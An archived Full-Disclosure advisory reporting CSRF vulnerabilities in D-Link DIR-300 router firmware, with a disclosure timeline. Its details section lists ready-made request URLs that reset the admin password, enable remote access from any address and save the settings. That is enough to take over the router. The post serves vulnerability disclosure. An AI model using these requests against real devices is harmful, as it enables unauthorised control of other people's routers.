| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <004c01d41aeb$93be3560$6700a8c0@pc>
Date: Fri, 13 Jul 2018 23:52:42 +0300
From: "MustLive" <mustlive@...security.com.ua>
To: <submissions@...ketstormsecurity.org>,
<fulldisclosure@...lists.org>
Subject: [FD] CSRF vulnerabilities in D-Link DIR-300
Hello list!
There are new Cross-Site Request Forgery vulnerabilities in D-Link DIR-300.
After my previous advisory.
-------------------------
Affected products:
-------------------------
Vulnerable is the next model: D-Link DIR-300NRUB5, Firmware 1.2.94. All
previous versions also must be vulnerable.
----------
Details:
----------
After previous AoF, BF and CSRF vulnerabilities, here is new Cross-Site
Request Forgery holes. To take control over device it's needed to make few
CSRF requests: change admin's password, login is fixed (this is earlier
mentioned AoF vulnerability), turn on remote access and save settings.
Cross-Site Request Forgery (WASC-09):
Change admin's password:
http://site/index.cgi?v2=y&rq=y&res_config_action=3&res_config_id=69&res_struct_size=1&res_buf=password|
Add settings to turn on remote access:
http://site/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=16&res_struct_size=0&res_buf={%22ips%22:%220.0.0.0%22,%22source_mask%22:%220.0.0.0%22,%22sport%22:80,%22dport%22:%2280%22}&res_pos=-1
Change current settings to turn on remote access:
http://site/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=16&res_struct_size=0&res_buf={%22ips%22:%220.0.0.0%22,%22source_mask%22:%220.0.0.0%22,%22sport%22:80,%22dport%22:%2280%22}&res_pos=1
Delete settings of remote access:
http://site/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=2&res_config_id=16&res_struct_size=0&res_pos=1
Save all changes in settings of device:
http://site/index.cgi?res_cmd=20&res_buf=null&res_cmd_type=bl&v2=y&rq=y
------------
Timeline:
------------
2016.03.17 - announced at my site about vulnerabilities in DIR-300.
2016.08.27 - disclosed at my site previous advisory about DIR-300.
2017.09.30 - disclosed this advisory (http://websecurity.com.ua/8165/).
2014-2018 - informed developers about multiple vulnerabilities in this and
other D-Link devices.
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists